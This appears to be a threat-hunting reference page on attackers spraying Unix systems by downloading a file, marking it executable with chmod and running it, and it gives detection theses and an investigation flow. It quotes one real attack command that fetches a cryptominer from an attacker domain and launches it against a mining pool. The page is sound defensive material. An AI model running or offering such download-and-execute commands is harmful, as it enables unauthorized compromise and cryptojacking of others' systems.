Remote file download followed by granting execution permission

Prev Next

Attack technique

Technique name: Remote file download followed by granting execution permission

MITRE ATT&CK

  • Tactic: Command and Control, Defense Evasion
  • Technique: Ingress Tool Transfer (T1105), File and Directory Permissions Modification (T1222.002)

Technique description
Spraying attacks targeting Unix systems are characterized by a distinct pattern within attacker mythology, involving the remote download of a malicious file followed by the immediate alteration of permissions to grant execution rights on the downloaded file using chmod. This method is notably employed by threat actors exploiting known (n-days) vulnerabilities, aiming to compromise systems at scale with minimal effort—often using a single or a few command lines.

Insights from threat intelligence
In recent years, there has been a significant rise in the prevalence of spraying attacks targeting Unix systems, particularly those designed for crypto mining and botnet campaigns. These operations are designed to affect large numbers of target systems indiscriminately, without specific regard for the nature of the targets. Such attacks are carried out by threat actors who exploit existing (n-days) vulnerabilities or capitalize on commonly used and weak user passwords over widely accessible protocols like SSH.

In the wild example:

sh -c cd /var/tmp/; curl -s --insecure <http[:]//moneyua[.]vip/dir> -o dir; chmod +x dir; ./dir -a minotaurx -o stratum+tcps[:]//stratum-eu.rplant[.]xyz:17063 -u MKkb4o9jUYmcQRRkpJWK82mW2S1ZZMtaLg.jajal -p password=jancok --no-longpoll -q --randomize --background > /dev/null

Threat hunting theses breakdown

Thesis 1: Remote file download followed by granting execution permission on the same command line

Relevant data sources: EDR Telemetry Logs

Thesis explanation
The thesis looks for spraying attacks which are characterized by the usage of built-in remote downloading utilities (such as curl, wget), chmod execution permission of the downloaded file, and execution of the file afterward on the same command line.

Blind spots

  • The attacker executes the commands separately, and not in a single command.
  • Unknown remote downloading utility that isn't curl or wget (less likely, given threat actors mostly utilize generic binaries that already exist on the system).

Thesis 2: Remote file download followed by granting execution permission based on time interval

Relevant data sources: EDR Telemetry Logs

Thesis explanation
The thesis looks for"spraying attacks which are characterized by the usage of built-in remote downloading utilities (such as curl, wget), chmod execution permission of the downloaded file, and execution of the file afterward on separated command lines on a 5-minute interval.

Blind spots

  • The attacker executes the commands separately over more than 5 minutes.
  • Unknown remote downloading utility that isn't curl or wget (less likely, given threat actors mostly utilize generic binaries that already exist on the system)

Recommended investigation flow

  • Investigate the remote download domain / URL that has been used in the commandline
    • Domain:
      • Is it in Umbrella 1M?
      • Is it a baby domain (registered recently)?
      • Which registrar registered it?
      • Does it have a valid certificate?
      • Does the whois information reveal the organization that owns the domain?
      • When was it first accessed by the organization?
      • How frequently is it accessed by the organization?
    • IP:
      • Which ASN does it belong to?
      • Is it hosting?
      • Is it a proxy IP?
      • When was it first accessed by the organization?
      • How frequently is it accessed by the organization?
  • Investigate the target file that has been executed
    • Investigate suspicious child processes
    • Investigate suspicious files it has written to the disk
  • Investigate the origin of the command line/s execution
    • Investigate the parent process of the executed command line/s, to understand the origin of the execution. Sometimes it can direct us on what vulnrability has been utilized.
    • Pivot and investigate other executions made by the same parent process.

Hunting queries

GitHub